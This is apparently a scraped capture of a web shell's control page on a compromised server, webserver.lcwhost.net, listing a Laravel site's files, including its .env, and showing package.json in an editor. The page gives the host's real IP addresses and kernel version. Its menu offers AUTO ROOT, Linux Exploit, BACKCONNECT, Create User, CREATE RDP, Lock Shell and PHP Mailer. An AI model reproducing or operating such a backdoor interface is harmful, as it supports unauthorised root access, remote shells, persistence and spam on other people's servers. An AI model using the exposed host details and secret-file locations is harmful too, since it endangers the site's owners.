Linux webserver.lcwhost.net 5.10.0-12-amd64 #1 SMP Debian 5.10.103-1 (2022-03-07) x86_64
LiteSpeed
: 194.163.130.72 | : 216.73.216.224
Cant Read [ /etc/named.conf ]
7.4.33
admin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
admin /
domains /
sm.lcwhost.net /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.editorconfig
258
B
-rw-r--r--
.env
1.25
KB
-rw-r--r--
.gitattributes
186
B
-rw-r--r--
.gitignore
278
B
-rw-r--r--
.htaccess
759
B
-rw-r--r--
README.md
4.01
KB
-rw-r--r--
artisan
350
B
-rw-r--r--
composer.json
4
KB
-rw-r--r--
composer.lock
522.74
KB
-rw-r--r--
index.php
582
B
-rw-r--r--
package-lock.json
117.88
KB
-rw-r--r--
package.json
982
B
-rw-r--r--
php
0
B
-rw-r--r--
phpunit.xml
1.16
KB
-rw-r--r--
postcss.config.js
91
B
-rw-r--r--
vite.config.js
2.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "private": true, "type": "module", "scripts": { "dev": "cross-env VITE_DEV_SERVER=true THEME=$npm_config_theme vite --config vite.config.js", "build": "cross-env VITE_DEV_SERVER=false THEME=$npm_config_theme vite build --config vite.config.js" }, "devDependencies": { "@tailwindcss/forms": "^0.5.10", "@tailwindcss/postcss": "^4.1.5", "@tailwindcss/typography": "^0.5.16", "alpinejs": "^3.4.2", "autoprefixer": "^10.4.21", "axios": "^1.7.4", "concurrently": "^9.1.2", "cross-env": "^7.0.3", "daisyui": "^5.0.28", "glob": "^11.0.1", "laravel-echo": "^2.0.2", "laravel-vite-plugin": "^1.0", "postcss": "^8.5.3", "preline": "^3.0.1", "pusher-js": "^8.4.0", "tailwindcss": "^4.1.5", "vite": "^5.0" }, "dependencies": { "@tailwindcss/vite": "^4.1.5", "tailwind-variants": "^1.0.0" } }
Close